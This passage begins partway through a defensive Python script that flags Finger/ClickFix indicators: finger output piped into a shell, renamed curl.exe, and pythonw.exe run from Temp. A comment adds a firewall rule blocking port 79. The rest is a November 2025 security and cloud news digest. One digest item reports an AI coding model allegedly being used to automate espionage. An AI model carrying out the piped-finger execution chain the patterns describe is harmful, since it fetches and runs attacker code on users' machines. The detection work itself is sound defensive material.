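    r'\bfinger(?:\.exe)?\b[^|]*\|\s*(?:cmd|powershell|pwsh)(?:\.exe)?\b', re.IGNORECASE)
# copy/move/rename with curl.exe as the source; group 1 or 2 captures the destination
CURL_RENAME = re.compile(
    r'\b(?:copy|move|ren|rename)\b\s+(?:"[^"]*curl\.exe"|\S*curl\.exe)\s+(?:"([^"]+)"|(\S+))',
    re.IGNORECASE)
# pythonw.exe executed from a subfolder of a Temp directory
PYTHONW_TEMP = re.compile(r'\\Temp\\[^\\\s]+\\pythonw\.exe', re.IGNORECASE)


def classify(command_line: str) -> list:
    """Return the list of Finger/ClickFix indicators matched by one command line."""
    reasons = []
    if FINGER_PIPE.search(command_line):
        reasons.append("finger output piped into a shell")
    match = CURL_RENAME.search(command_line)
    if match:
        dest = match.group(1) or match.group(2)
        if not dest.lower().endswith("curl.exe"):
            reasons.append("curl.exe copied under a new name: " + dest.rsplit("\\", 1)[-1])
    if PYTHONW_TEMP.search(command_line):
        reasons.append("pythonw.exe launched from a Temp subfolder")
    return reasons


def scan(events) -> list:
    """Return (command_line, reasons) for every event matching at least one indicator."""
    flagged = []
    for _parent, cmd in events:
        reasons = classify(cmd)
        if reasons:
            flagged.append((cmd, reasons))
    return flagged


# Network-side mitigation from the article: deny outbound TCP/79 so the remote
# Finger daemon is never reached. Equivalent host rule on Windows (run elevated):
#   netsh advfirewall firewall add rule name="Block Finger egress" dir=out action=block protocol=TCP remoteport=79
def egress_allowed(dst_port: int, blocked_ports=(79,)) -> bool:
    """Policy check: True if an outbound connection to dst_port is permitted."""
    return dst_port not in blocked_ports


if __name__ == "__main__":
    for cmd, reasons in scan(SAMPLE_EVENTS):
        print(cmd, "->", "; ".join(reasons))
```

Each indicator on its own is weak (a plain `finger` lookup is not flagged), so the value is in correlating them within one process tree; the port-79 block remains the control that stops the chain regardless of which lure variant was used.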

Sat, November 15, 2025

Five Americans Plead Guilty to Enabling North Korea IT Fraud

⚖️ The U.S. Department of Justice announced five U.S. citizens pleaded guilty for facilitating North Korea’s illicit IT worker and revenue-generation schemes. The defendants hosted company-issued laptops, supplied or sold U.S. identities, and helped overseas IT workers pass vetting to obtain jobs at American firms. DOJ says the schemes impacted more than 136 U.S. companies, generated over $2.2 million for the DPRK, and compromised the identities of more than 18 U.S. persons.

Fri, November 14, 2025

Amazon SageMaker Catalog Adds S3 Read/Write Access

📂 Amazon SageMaker Catalog now supports read and write access to Amazon S3 general purpose buckets, enabling data scientists and analysts to discover, process, and share unstructured data alongside structured datasets. Data publishers can grant read-only or read/write permissions when approving subscriptions or sharing S3 data, allowing processed outputs to be written back to the original bucket or folder. This feature is available in all Regions that support SageMaker Unified Studio and can be accessed via the studio UI, the Amazon DataZone API, SDK, or AWS CLI.

Sun, November 16, 2025

Google to Flag Android Apps for Excessive Battery Use

🔋 Google will begin flagging Android apps on Google Play that show high background activity and cause excessive battery drain. The change centers on a new Android Vitals metric called excessive partial wake locks, and apps that cross the bad-behavior threshold may be labeled as battery drainers and lose prominence in discovery surfaces. Developers will receive alerts in their Android Vitals dashboard and have until March 1, 2026 to remediate issues.

Fri, November 14, 2025

Amazon ECS improves service availability for rolling deploys

🔁 Amazon Elastic Container Service (Amazon ECS) now replaces unhealthy or terminated tasks with healthy tasks from the same service revision during rolling deployments instead of prioritizing the new revision. This prevents service availability drops when new task versions fail health checks or cannot start. Application Auto Scaling scale-outs are applied across both revisions so the running version can handle increased load. These changes respect maximumPercent and minimumHealthyPercent and are enabled by default in all Regions.

Fri, November 14, 2025

Using BigQuery ML to Solve Lookalike Audiences at Zeotap

🔍 Zeotap and Google Cloud describe a SQL-first approach to building scalable lookalike audiences entirely within BigQuery. They convert low-cardinality categorical features into one-hot and multi-hot vectors, use Jaccard similarity reframed via dot-product and Manhattan norms, and index vectors with BigQuery’s VECTOR_SEARCH. By combining pre-filtering on discriminative features and batching queries, the workflow reduces compute, latency, and cost while avoiding a separate vector database.
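The Jaccard reframing mentioned above is worth seeing worked through. For binary vectors, the intersection size is the dot product and the union size is the sum of the two Manhattan (L1) norms minus that dot product, which is what lets a vector index stand in for set operations. The Python below is an added example, not Zeotap's or Google Cloud's code: it encodes a constructed set of toy profiles as one-hot (country) and multi-hot (interests) vectors, computes Jaccard both ways to cross-check, and applies the pre-filter-then-score pattern the summary describes. Profile values and function names are assumptions for the example.

```python
from itertools import chain

# Constructed toy profiles (not Zeotap data): 'country' is a single-valued,
# low-cardinality categorical (one-hot); 'interests' is set-valued (multi-hot).
PROFILES = {
    "u1": {"country": "DE", "interests": {"cars", "travel"}},
    "u2": {"country": "DE", "interests": {"cars", "finance"}},
    "u3": {"country": "FR", "interests": {"travel"}},
    "u4": {"country": "DE", "interests": {"cars", "travel", "finance"}},
}


def build_vocab(profiles):
    """Fixed column order: one slot per country value, then one per interest value."""
    countries = sorted({p["country"] for p in profiles.values()})
    interests = sorted(set(chain.from_iterable(p["interests"] for p in profiles.values())))
    return [("country", c) for c in countries] + [("interest", i) for i in interests]


def encode(profile, vocab):
    """Binary vector: one-hot for the country slots, multi-hot for the interest slots."""
    return [
        1 if (kind == "country" and profile["country"] == value)
        or (kind == "interest" and value in profile["interests"]) else 0
        for kind, value in vocab
    ]


def jaccard_from_vectors(a, b):
    """Jaccard on binary vectors: |A∩B| = a·b and |A∪B| = ||a||1 + ||b||1 - a·b.
    Only a dot product and two L1 norms are needed, which a vector index can serve."""
    dot = sum(x * y for x, y in zip(a, b))
    union = sum(a) + sum(b) - dot
    return dot / union if union else 0.0


def jaccard_from_sets(p, q):
    """Reference set-based Jaccard over (feature, value) tokens, used to cross-check."""
    tp = {("country", p["country"])} | {("interest", i) for i in p["interests"]}
    tq = {("country", q["country"])} | {("interest", i) for i in q["interests"]}
    return len(tp & tq) / len(tp | tq)


def lookalikes(seed_id, profiles, top_k=2, prefilter_on="country"):
    """Rank candidates by Jaccard to the seed. With prefilter_on set, only candidates
    sharing the seed's value for that discriminative feature are scored at all."""
    vocab = build_vocab(profiles)
    seed = profiles[seed_id]
    seed_vec = encode(seed, vocab)
    scored = []
    for uid, prof in profiles.items():
        if uid == seed_id:
            continue
        if prefilter_on and prof[prefilter_on] != seed[prefilter_on]:
            continue
        scored.append((uid, jaccard_from_vectors(seed_vec, encode(prof, vocab))))
    scored.sort(key=lambda t: (-t[1], t[0]))
    return scored[:top_k]


if __name__ == "__main__":
    print(lookalikes("u1", PROFILES))
```

The pre-filter is what keeps the approach cheap at scale: a candidate that fails the discriminative feature is never encoded or scored, so the expensive similarity step runs over a fraction of the population.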

Fri, November 14, 2025

AWS IoT adds VPC Endpoints and IPv6 Connectivity Support

🔒 AWS has expanded AWS IoT Core, AWS IoT Device Management, and AWS IoT Device Defender to support VPC endpoints via AWS PrivateLink and IPv6 for both VPC and public endpoints. Developers can route data plane operations, management APIs, and credential requests entirely within VPCs, keeping traffic off the public internet. Configuration is available through the AWS Management Console, AWS CLI, and CloudFormation, and the features are GA in all Regions that offer these services.

Fri, November 14, 2025

Amazon RDS Adds Support for PostgreSQL Major Version 18

🚀 Amazon RDS for PostgreSQL now supports PostgreSQL major version 18.1, bringing community improvements to managed RDS instances. Key performance updates include skip scan for multicolumn B-tree indexes, parallel GIN builds, and better OR/IN handling, while UUIDv7 adds ordered UUIDs for high-throughput systems. Observability and extension support are expanded, and upgrades can use Blue/Green, in-place, or snapshot restore options.

Fri, November 14, 2025

Amazon SQS Adds IPv6 and FIPS 140-3 in GovCloud Regions

🔒 Amazon SQS now supports API requests over IPv6 in the AWS GovCloud (US) Regions, with the new endpoints validated under FIPS 140-3. Customers can choose IPv6 or IPv4 when sending requests over dual‑stack public or VPC endpoints. This update brings parity across Regions: Amazon SQS now supports IPv6 in AWS Commercial, AWS GovCloud (US), and China Regions. Refer to the developer guide for configuration details.

Fri, November 14, 2025

Anthropic's Claim of Claude-Driven Attacks Draws Skepticism

🛡️ Anthropic says a Chinese state-sponsored group tracked as GTG-1002 leveraged its Claude Code model to largely automate a cyber-espionage campaign against roughly 30 organizations, an operation it says it disrupted in mid-September 2025. The company described a six-phase workflow in which Claude allegedly performed scanning, vulnerability discovery, payload generation, and post-exploitation, with humans intervening for about 10–20% of tasks. Security researchers reacted with skepticism, citing the absence of published indicators of compromise and limited technical detail. Anthropic reports it banned offending accounts, improved detection, and shared intelligence with partners.

Fri, November 14, 2025

Ransomware Fragmentation Peaks as LockBit Re-emerges

🔒 Q3 2025 saw an unprecedented decentralization of ransomware, with Check Point Research tracking a record 85 active groups and roughly 1,592 disclosed victims across numerous leak sites. Despite enforcement actions and multiple takedowns, affiliates quickly reconstitute or rebrand, spawning 14 new ransomware brands this quarter. The return of LockBit 5.0 — with updated Windows, Linux and ESXi variants and individualized negotiation portals — suggests a possible shift back toward centralization, while marketing-driven actors like DragonForce further complicate attribution and response.

Fri, November 14, 2025

Agentic AI Expands Identity Attack Surface Risks for Orgs

🔐 Rubrik Zero Labs warns that the rise of agentic AI has created a widening gap between an expanding identity attack surface and organizations’ ability to recover from compromises. Their report, Identity Crisis: Understanding & Building Resilience Against Identity-Driven Threats, finds 89% of organizations have integrated AI agents and estimates NHIs outnumber humans roughly 82:1. The authors call for comprehensive identity resilience—beyond traditional IAM—emphasizing zero trust, least privilege, and lifecycle control for non-human identities.

Fri, November 14, 2025

AWS Network Firewall Now Available in Auckland Region

🔒 AWS Network Firewall is now available in the AWS New Zealand (Auckland) Region, enabling customers to deploy essential network protections across all Amazon VPCs. As a managed firewall service, it automatically scales with traffic volume and delivers high availability without requiring customers to provision or maintain infrastructure. It integrates with AWS Firewall Manager to provide centralized visibility and policy control across multiple AWS accounts, simplifying governance and enforcement.

Sat, November 15, 2025

Social Engineering: How Attackers Exploit Human Weakness

🧠 Social engineering exploits human psychology to bypass technical and physical safeguards, using impersonation, deception and manipulation to gain access to systems, facilities or data. Attackers commonly use phishing, vishing, smishing, pretexting, baiting and tailgating after extensive reconnaissance to craft believable lures. High-value targets are often pursued via spear-phishing or BEC schemes, while opportunistic attackers rely on mass phishing. Practical defenses include ongoing security awareness training, verified procedures for urgent requests and realistic simulation tests; tools such as Social-Engineer Toolkit help organizations test their resilience.

Fri, November 14, 2025

Shadow IT and Shadow AI: Risks Across Every Industry

🔍 Shadow IT — any software, hardware, or resource introduced without formal IT, procurement, or compliance approval — is now pervasive and evolving into Shadow AI, where unsanctioned generative AI tools expand the attack surface. The article outlines how these practices drive operational, security, and regulatory risk, citing IBM’s 2025 breach-cost data and industry examples in healthcare, finance, airlines, insurance, and utilities. It recommends shifting from elimination to smarter control by improving continuous visibility through real‑time network analysis and vendor integrations that turn hidden activity into actionable intelligence.

Fri, November 14, 2025

Google reverses Android developer verification plan

🔁 Google has softened its planned Developer Verification requirements after widespread backlash, saying it will create a dedicated account type for limited app distribution and an advanced sideloading flow for experienced users. The original rule would have blocked installation of apps from unverified developers on certified devices beginning in 2026. Google says these changes respond to concerns from students, hobbyists, and power users who need accessible or higher-risk pathways to install apps.

Fri, November 14, 2025

Network Visibility: The Thread Holding Cybersecurity

🔍 ESG research shows that environmental complexity, not malware or phishing, is viewed by most organizations as the primary barrier to effective detection and response. As alerts proliferate and validation can take hours, teams are turning to the one transit every attack must cross — the network — for a reliable, unbiased source of truth. Shared network visibility between SecOps and NetOps, together with continuous packet capture, improves investigation speed and confidence. Vendors such as NETSCOUT Omnis Cyber Intelligence (OCI) deliver alert-independent, packet-level context and deep packet inspection to reduce dwell time and streamline incident response.

Fri, November 14, 2025

Adversarial AI Bots vs Autonomous Threat Hunters Outlook

🤖 AI-driven adversarial bots are rapidly amplifying attackers' capabilities, enabling autonomous pen testing and large-scale credential abuse that many organizations aren't prepared to detect or remediate. Tools like XBOW and Hexstrike-AI demonstrate how agentic systems can discover zero-days and coordinate complex operations at scale. Defenders must adopt continuous, context-rich approaches such as digital twins for real-time threat modeling rather than relying on incremental automation.

Sat, November 15, 2025

Windows 10 KB5068781 ESU Update Fails With 0x800f0922

⚠️ Microsoft is investigating a bug that can cause the Windows 10 KB5068781 Extended Security Update to fail installation with error 0x800f0922 on devices licensed via Windows subscription activation. The update, released November 11 as the first ESU release, may appear to install but then roll back after a restart. Microsoft says the issue is isolated to activations through the Microsoft 365 Admin Center and has provided no ETA or workaround.

Fri, November 14, 2025

AWS re:Invent 2025 — Security Sessions & Themes Overview

🔒 AWS re:Invent 2025 highlights an expanded Security and Identity track featuring more than 80 sessions across breakouts, workshops, chalk talks, and hands-on builders’ sessions. The program groups content into four practical themes — Securing and Leveraging AI, Architecting Security and Identity at scale, Building and scaling a Culture of Security, and Innovations in AWS Security — with real-world guidance and demos. Attendees can meet experts at the Security and AI Security kiosks in the expo hall and are encouraged to reserve limited-capacity hands-on sessions early to secure seats.

Fri, November 14, 2025

Waze modernizes session handling with Memorystore Cluster

🚀 Waze centralized its real-time session state into a new Session Server backed by Memorystore for Redis Cluster, enabling shared, low-latency access across microservices and removing tight coupling to the monolithic RT service. The team executed a dual-write migration from Memcached to ensure data parity and achieve a zero-downtime cutover. The resulting system sustains over 1 million MGET/s with stable sub-millisecond latency and leverages partial updates to reduce network and write costs.

Fri, November 14, 2025

Agent Factory Recap: Building Open Agentic Models End-to-End

🤖 This recap of The Agent Factory episode summarizes a conversation between Amit Maraj and Ravin Kumar (DeepMind) about building open-source agentic models. It highlights how agent training differs from standard ML, emphasizing trajectory-based data, a two-stage approach of supervised fine-tuning followed by reinforcement learning, and the paramount role of evaluation. Practical guidance includes defining a 50-example final exam up front and considering hybrid setups that use a powerful API like Gemini as a router alongside specialized open models.

Fri, November 14, 2025

Turning AI Visibility into Strategic CIO Priorities

🔎 Generative AI adoption in the enterprise has surged, with studies showing roughly 90% of employees using AI tools often without IT's knowledge. CIOs must move beyond discovery to build a coherent strategy that balances productivity gains with security, compliance, and governance. That requires continuous visibility into shadow AI usage, risk-based controls, and integration of policies into network and cloud architectures such as SASE. By aligning policy, education, and technical controls, organizations can harness GenAI while limiting data leakage and operational risk.

Fri, November 14, 2025

Bruce Schneier — Speaking Engagements, Nov 2025–Feb 2026

📅 Bruce Schneier lists his upcoming public and virtual speaking engagements through February 2026, including joint appearances with coauthor Nathan E. Sanders and solo presentations. Highlights include a talk on AI and Congress: Practical Steps to Govern and Prepare at the Rayburn House Office Building in Washington, DC (Nov 17, noon ET) and a campus presentation on Integrity and Trustworthy AI at North Hennepin Community College (Nov 21, 2:00 PM CT). Additional events are scheduled at the MIT Museum (Dec 1, 6:00 PM ET), a virtual City Lights event on Zoom (Dec 3, 6:00 PM PT), and a book signing at the Chicago Public Library (Feb 5, 2026). The schedule is maintained on his events page for updates and details.

Fri, November 14, 2025

From Detection to Response: Confidence and Visibility

🔦 Network visibility is the critical lens that turns detection into decisive action. ESG research cited in the article shows 98% of organizations say visibility helps them move from detection to response faster and with greater confidence. Detection raises the alarm; packet-level investigation reveals scope, lateral movement, and exfiltration so analysts can validate alerts and act precisely. The piece positions NETSCOUT Omnis Cyber Intelligence as a scalable DPI capability that unifies SecOps and NetOps across hybrid and multicloud environments to eliminate blind spots and enable targeted response.

Fri, November 14, 2025

SOC Efficiency: The Most Valuable Cybersecurity Asset

🔍 Efficiency in security is about focus, not speed. ESG research finds 53% of organizations credit NDR with improving SOC analyst efficiency by reducing false positives and eliminating blind spots. Continuous packet capture and full-fidelity network visibility let analysts of all levels investigate with greater confidence and speed. NETSCOUT Omnis Cyber Intelligence is offered as a solution to provide that visibility and maximize scarce human resources.

Fri, November 14, 2025

From Military Service to Cybersecurity: Veteran Pathways

🛡️ Fortinet partnered with BCIT, Cyber Catalyst, and Tech Vets Canada to deliver a one-week Industrial Control Systems cybersecurity microcredential intensive for Canadian veterans, providing hands-on labs and practical workshops. Through exercises in network segmentation, access control, and threat detection, participants translated military skills—leadership, discipline, resilience—into cybersecurity capabilities protecting critical infrastructure. The program paired technical training with mentorship, career transition support, and pathways to internships and certification, reflecting Fortinet’s commitment to building a more diverse, skilled cyber workforce.

Fri, November 14, 2025

The Role of Human Judgment in an AI-Powered World Today

🧭 The essay argues that as AI capabilities expand, we must clearly separate tasks best handled by machines from those requiring human judgment. For narrow, fact-based problems—such as reading diagnostic tests—AI should be preferred when demonstrably more accurate. By contrast, many public-policy and justice questions involve conflicting values and no single factual answer; those judgment-laden decisions should remain primarily human responsibilities, with machines assisting implementation and escalating difficult cases.

Fri, November 14, 2025

Books Shaping Modern Cybersecurity Leadership and Strategy

📚 This CSO Online roundup gathers books recommended by practicing CISOs to refine judgment, influence leadership style, and navigate modern security complexity. Recommendations range from risk and AI-focused studies to cognitive science, social engineering narratives, and organizational behavior, showing how reading informs both tactical and strategic decisions. The list highlights practical guides for risk measurement, frameworks for improving focus and decision making, and titles that remind leaders to protect attention and sustain personal resilience.

Fri, November 14, 2025

CIO100 & CSO30 ASEAN Awards Celebrate Tech Leadership

🏆 The CIO100 and CSO30 ASEAN and Hong Kong Awards Gala on November 12, 2025 validated the region's maturing technology leadership, drawing winners and teams from Singapore, Malaysia, Indonesia, Vietnam, Cambodia, Thailand, Hong Kong and the Philippines. With a record 243 nominations, the program highlighted artificial intelligence as the defining strategic imperative reshaping operations, innovation and security. Judges prioritized clear, measurable business impact, recognizing cybersecurity leaders and collaborative public–private initiatives. AWS was the headline sponsor.
